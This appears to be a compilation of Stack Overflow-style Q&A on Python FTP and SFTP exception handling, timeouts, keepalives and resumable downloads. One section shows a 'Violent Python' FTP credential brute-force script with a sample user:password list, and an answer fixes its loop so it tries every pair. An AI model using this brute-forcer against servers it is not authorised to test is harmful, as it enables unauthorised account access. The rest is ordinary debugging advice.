I have a short piece of code that FTPs a small file to a server.
import ftplib

session = ftplib.FTP("192.168.0.164", "admin", "admin")
file = open("path/test.txt", "rb")
try:
    session.storbinary("STOR application/test.txt", file)
except:
    print("failed")
else:
    print("success!")
file.close()
In the above piece I changed the IP address so it would fail (there is no 192.168.0.164 device), but it doesn't print "failed" like it's supposed to. In the terminal I get a
"connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond" error.
If I mistype the path, I also don't get a "failed" print in the terminal.
If I type in the correct IP the success part does work.
Am I using the try/except wrong?
UPDATE:
Current code looks like this:
file = open("path/test.txt", "rb")
try:
    session = ftplib.FTP("192.168.0.161", "admin", "admin")
    session.storbinary("STOR application/test.txt", file)
except:
    print("Unable to reach host")
else:
    print("success!")
    session.quit()
finally:
    print("DONE!!")
    file.close()
I figured ftplib.all_errors would catch all errors (host unreachable and file not found). It seems to catch the unreachable-host errors, but not the file-not-found errors.
Am I using the try/except wrong?
Your syntax is correct, but Python is not actually reaching the try block at all.
When you call session = ftplib.FTP(host, ...) where host is unreachable, the code will stop in its tracks there. That's because FTP.__init__() greedily calls self.connect(). This will in turn call socket.create_connection(), which will not succeed for an unreachable host.
So you'd need to modify it to:
with open("path/test.txt", "rb") as file:
    session = None
    try:
        session = ftplib.FTP("192.168.0.164", "admin", "admin")
        session.storbinary("STOR application/test.txt", file)
    except Exception as e:
        print("failed")
        print(e)
    else:
        print("success!")
    finally:
        # only quit() if the connection was actually established
        if session is not None:
            session.quit()
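If you end up doing this upload in more than one place, a small helper keeps the handling in one spot. A minimal sketch, assuming the same host, credentials and paths as above (upload_file is a name introduced here, not part of the original code); catching ftplib.all_errors instead of a bare Exception limits the handler to FTP- and socket-related failures, so unrelated bugs still surface:

import ftplib

def upload_file(host, user, password, local_path, remote_path):
    # Upload one file and report the outcome; returns True on success.
    try:
        with ftplib.FTP(host, user, password) as session, open(local_path, "rb") as f:
            session.storbinary("STOR " + remote_path, f)
    except ftplib.all_errors as e:
        # all_errors covers the ftplib.Error subclasses plus OSError and EOFError,
        # so both an unreachable host and a missing local file land here
        print("failed:", e)
        return False
    print("success!")
    return True

upload_file("192.168.0.164", "admin", "admin", "path/test.txt", "application/test.txt")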
Related
I am trying to connect to an account on Splunk via Python and Bash. I can connect to the website fine, and it prints what I want in the terminal when I log in correctly. However, when I use the wrong login details, it prints a large error message saying 'login failed' that I want to try and condense to one line only.
This is what I am using to connect to Splunk:
service = client.connect(
    host=splunk_config['host'],
    port=splunk_config['port'],
    username=splunk_config['username'],
    password=splunk_config['password'])
I want to do something along the lines of:
if (service errors):
    print("Failed to connect")
else:
    print("Successfully connected")
Without seeing the exception, and guessing you're using splunklib, I would imagine you need something like:
try:
    service = client.connect(
        host=splunk_config['host'],
        port=splunk_config['port'],
        username=splunk_config['username'],
        password=splunk_config['password'])
    print("Login successful")
except splunklib.binding.AuthenticationError as e:
    print("Login failed")
I am using pysftp with Python 3.7 to set up an SFTP client script.
My code (simplified and minimal):
import pysftp
import sys

# Variables
destination_dir = 'BOGUS_DIR'
server = 'myserver.mydomain.com'
user = 'my_user'
key = 'my_key'
port = 22

# cnopts
mycnopts = pysftp.CnOpts()
mycnopts.log = True
mycnopts.compression = True
mycnopts.ciphers = None
mycnopts.hostkeys = None

try:
    with pysftp.Connection(server, username=user, private_key=key, port=port, cnopts=mycnopts) as sftp:
        try:
            with sftp.cd(destination_dir):
                print("OK cd worked")
        except:
            print("NOT OK cd failed")
            e = sys.exc_info()
            print("Exception: {0}".format(e))

        if sftp.isdir(destination_dir):
            print("OK isdir")
        else:
            print("NOT OK isdir")
except:
    print("Connection failure.")
    e = sys.exc_info()
    print("Exception: {0}".format(e))
The output is: OK cd worked
But I know for a fact that BOGUS_DIR does not exist. It is like pysftp does not raise the exception on cd(), or I am catching it wrong (i.e. my Python code is not written properly).
Same for isdir(): whatever I pass as a parameter, it always returns True, even if the directory does not exist.
If I change my connection parameters for something wrong, I do catch the connection failure exception.
Is pysftp processing exceptions wrong, or is my code at fault here? Should I not trust pysftp and use Paramiko directly?
If the directory does not exist, you get an error from the remote shell where you are trying to run the command. In this code you are trying to catch an exception that can only be raised by sftp. Maybe you should check the status code that the sftp module returns after each executed shell command.
Ok I figured it out, I think.
sftp.cd() does not raise an exception if the directory does not exist. Only operations on the bad directory do. So if I modify my code like this:
....
try:
    with sftp.cd(destination_dir):
        sftp.listdir()
        print("OK cd worked")
except:
    print("NOT OK cd failed")
    e = sys.exc_info()
    print("Exception: {0}".format(e))
....
This way I get an exception, since sftp.listdir() cannot work with a nonexistent directory.
It is almost as if sftp.cd() does nothing other than set the value of the current directory, without actually doing anything with it.
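If you want the check to fail fast without doing a listing, one option is to stat the path first. A sketch, assuming pysftp's stat() wrapper around Paramiko's SFTPClient.stat, and the same sftp connection and destination_dir as above:

import sys

try:
    sftp.stat(destination_dir)  # raises IOError/FileNotFoundError if the path does not exist
except IOError as e:
    print("NOT OK: {0} does not exist".format(destination_dir))
    print("Exception: {0}".format(e))
else:
    with sftp.cd(destination_dir):
        print("OK cd worked")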
I am following along with code from the Violent Python book. This is what I have here, testing a brute-force login against an FTP server:
import ftplib

def bruteLogin(hostname, passwdFile):
    pF = open(passwdFile, 'r')
    for line in pF.readlines():
        userName = line.split(':')[0]
        passWord = line.split(':')[1].strip('\r').strip('\n')
        print("[+] Trying: "+userName+"/"+passWord)
        try:
            ftp = ftplib.FTP(hostname)
            ftp.login(userName, passWord)
            print('\n[*] ' + str(hostname) +
                  ' FTP Logon Succeeded: '+userName+"/"+passWord)
            ftp.quit()
            return (userName, passWord)
        except Exception as e:
            pass
        print('\n[-] Could not brute force FTP credentials.')
        return (None, None)

host = '192.168.95.179'
passwdFile = 'C:/Users/Andrew/Documents/Python Stuff/userpass.txt'
bruteLogin(host, passwdFile)
Using an example 'userpass.txt' consisting of:
administrator:password
admin:12345
root:secret
guest:guest
root:root
When running it (I am using Python 3.4, by the way), it is supposed to produce a result like this:
[+] Trying: administrator/password
[+] Trying: admin/12345
[+] Trying: root/secret
[+] Trying: guest/guest
[*] 192.168.95.179 FTP Logon Succeeded: guest/guest
The above is an example of a successful logon, of course. When actually running it, it prints the "Could not brute force FTP credentials" message, but it seems to only try the very first line of the text file, instead of passing over the exception and trying the other lines, as described in the book. Any ideas?
You should print that "Could not brute force..." line only after the loop has completed. Your current code prints it (and returns) inside the loop, so as soon as the first attempt fails, the message is printed and the function gives up.
Also, it is easier to reason about exceptions if you keep the try block as short as possible and the exception to be caught as specific as possible. That reduces the number of cases where an exception is handled and lets all other, unrelated exceptions explode and become visible, helping you debug your code in the places that you don't expect to raise exceptions. Your code could look like this then:
def bruteLogin(hostname, passwdFile):
    pF = open(passwdFile, 'r')
    ftp = ftplib.FTP(hostname)  # reuse the connection
    for line in pF.readlines():
        userName, passWord = line.split(':', 1)  # split only once, the pw may contain a :
        passWord = passWord.strip('\r\n')  # strip any of the two characters
        print("[+] Trying: {}/{}".format(userName, passWord))
        try:
            ftp.login(userName, passWord)
        except ftplib.error_perm:
            continue
        else:
            print('\n[*] {} FTP Logon Succeeded: {}/{}'.format(hostname, userName, passWord))
            ftp.quit()
            return userName, passWord
    print('\n[-] Could not brute force FTP credentials.')
    return None, None
I have an FTP connection from which I am downloading many files and processing them in between. I'd like to be able to check that my FTP connection hasn't timed out in between. So the code looks something like:
from ftplib import FTP

conn = FTP(host='blah')
conn.connect()

for item in list_of_items:
    myfile = open('filename', 'wb')
    conn.retrbinary('stuff', myfile.write)
    ### do some parsing ###
How can I check my FTP connection in case it timed out during the ### do some parsing ### line?
Send a NOOP command. This does nothing but check that the connection is still going and if you do it periodically it can keep the connection alive.
For example:
conn.voidcmd("NOOP")
If there is a problem with the connection then the FTP object will throw an exception. You can see from the documentation that exceptions are thrown if there is an error:
socket.error and IOError: These are raised by the socket connection and are most likely the ones you are interested in.
exception ftplib.error_reply: Exception raised when an unexpected reply is received from the server.
exception ftplib.error_temp: Exception raised when an error code signifying a temporary error (response codes in the range 400–499) is received.
exception ftplib.error_perm: Exception raised when an error code signifying a permanent error (response codes in the range 500–599) is received.
exception ftplib.error_proto: Exception raised when a reply is received from the server that does not fit the response specifications of the File Transfer Protocol, i.e. begin with a digit in the range 1–5.
Therefore you can use a try-catch block to detect the error and handle it accordingly.
For example this sample of code will catch an IOError, tell you about it and then retry the operation:
retry = True
while (retry):
    try:
        conn = FTP('blah')
        conn.connect()
        for item in list_of_items:
            myfile = open('filename', 'wb')
            conn.retrbinary('stuff', myfile.write)
            ### do some parsing ###
        retry = False
    except IOError as e:
        print "I/O error({0}): {1}".format(e.errno, e.strerror)
        print "Retrying..."
        retry = True
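If you just want a quick liveness check inside the parsing loop rather than a full retry wrapper, a minimal sketch along the same lines (connection_alive is a helper name introduced here; conn is the FTP object from the question, and you would still need to redo any login after reconnecting):

import ftplib

def connection_alive(conn):
    # Probe the control connection with NOOP; any FTP or socket error means it is gone.
    try:
        conn.voidcmd("NOOP")
        return True
    except ftplib.all_errors:
        return False

# inside the download loop, before the next transfer:
if not connection_alive(conn):
    conn = ftplib.FTP(host='blah')  # reconnect (and log in again if required)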
I'm downloading files from a flaky FTP server that often times out during file transfer and I was wondering if there was a way to reconnect and resume the download. I'm using Python's ftplib. Here is the code that I am using:
#! /usr/bin/python

import ftplib
import os
import socket
import sys

#--------------------------------#
# Define parameters for ftp site #
#--------------------------------#
site = 'a.really.unstable.server'
user = 'anonymous'
password = 'someperson#somewhere.edu'
root_ftp_dir = '/directory1/'
root_local_dir = '/directory2/'

#---------------------------------------------------------------
# Tuple of order numbers to download. Each web request generates
# an order number
#---------------------------------------------------------------
order_num = ('1','2','3','4')

#----------------------------------------------------------------#
# Loop through each order. Connect to server on each loop. There #
# might be a time out for the connection therefore reconnect for #
# every new ordernumber                                          #
#----------------------------------------------------------------#

# First change local directory
os.chdir(root_local_dir)

# Begin loop through
for order in order_num:

    print 'Begin Processing order number %s' % order

    # Connect to FTP site
    try:
        ftp = ftplib.FTP(host=site, timeout=1200)
    except (socket.error, socket.gaierror), e:
        print 'ERROR: Unable to reach "%s"' % site
        sys.exit()

    # Login
    try:
        ftp.login(user, password)
    except ftplib.error_perm:
        print 'ERROR: Unable to login'
        ftp.quit()
        sys.exit()

    # Change remote directory to location of order
    try:
        ftp.cwd(root_ftp_dir + order)
    except ftplib.error_perm:
        print 'Unable to CD to "%s"' % (root_ftp_dir + order)
        sys.exit()

    # Get a list of files
    try:
        filelist = ftp.nlst()
    except ftplib.error_perm:
        print 'Unable to get file list from "%s"' % order
        sys.exit()

    #---------------------------------#
    # Loop through files and download #
    #---------------------------------#
    for each_file in filelist:
        file_local = open(each_file, 'wb')
        try:
            ftp.retrbinary('RETR %s' % each_file, file_local.write)
            file_local.close()
        except ftplib.error_perm:
            print 'ERROR: cannot read file "%s"' % each_file
            os.unlink(each_file)

    ftp.quit()
    print 'Finished Processing order number %s' % order

sys.exit()
The error that I get:
socket.error: [Errno 110] Connection timed out
Any help is greatly appreciated.
Resuming a download through FTP using only standard facilities (see RFC959) requires use of the block transmission mode (section 3.4.2), which can be set using the MODE B command. Although this feature is technically required for conformance to the specification, I'm not sure all FTP server software implements it.
In the block transmission mode, as opposed to the stream transmission mode, the server sends the file in chunks, each of which has a marker. This marker may be re-submitted to the server to restart a failed transfer (section 3.5).
The specification says:
[...] a restart procedure is provided to protect users from gross system failures (including failures of a host, an FTP-process, or the underlying network).
However, AFAIK, the specification does not define a required lifetime for markers. It only says the following:
The marker information has meaning only to the sender, but must consist of printable characters in the default or negotiated language of the control connection (ASCII or EBCDIC). The marker could represent a bit-count, a record-count, or any other information by which a system may identify a data checkpoint. The receiver of data, if it implements the restart procedure, would then mark the corresponding position of this marker in the receiving system, and return this information to the user.
It should be safe to assume that servers implementing this feature will provide markers that are valid between FTP sessions, but your mileage may vary.
A simple example for implementing a resumable FTP download using Python ftplib:
from ftplib import FTP
import time

def connect():
    # host, user and passwd are assumed to be defined elsewhere
    ftp = None
    finished = False
    with open('bigfile', 'wb') as f:
        while not finished:
            if ftp is None:
                print("Connecting...")
                ftp = FTP(host, user, passwd)
            try:
                rest = f.tell()
                if rest == 0:
                    rest = None
                    print("Starting new transfer...")
                else:
                    print(f"Resuming transfer from {rest}...")
                ftp.retrbinary('RETR bigfile', f.write, rest=rest)
                print("Done")
                finished = True
            except Exception as e:
                ftp = None
                sec = 5
                print(f"Transfer failed: {e}, will retry in {sec} seconds...")
                time.sleep(sec)
More fine-grained exception handling is advisable.
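For example, the handler inside the loop above could distinguish temporary failures from permanent ones; a sketch (the split between transient transport errors and permanent 5xx replies is a choice made here, not part of the original code):

import socket
import ftplib
import time

try:
    ftp.retrbinary('RETR bigfile', f.write, rest=rest)
    finished = True
except (ftplib.error_temp, socket.error, EOFError) as e:
    # transient failure (timeout, dropped connection, 4xx reply): reconnect and retry
    ftp = None
    print(f"Transfer failed: {e}, will retry in 5 seconds...")
    time.sleep(5)
except ftplib.error_perm as e:
    # permanent 5xx reply (e.g. the file does not exist): retrying will not help
    print(f"Giving up: {e}")
    raise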
Similarly for uploads:
Handling disconnects in Python ftplib FTP transfers file upload
To do this, you would have to keep the interrupted download, then figure out which parts of the file you are missing, download those parts and then join them together. I'm not sure how to do this, but there is a download manager for Firefox and Chrome called DownThemAll that does this. Although the code is not written in Python (I think it's JavaScript), you could look at the code and see how it does this.
DownThemAll - http://www.downthemall.net/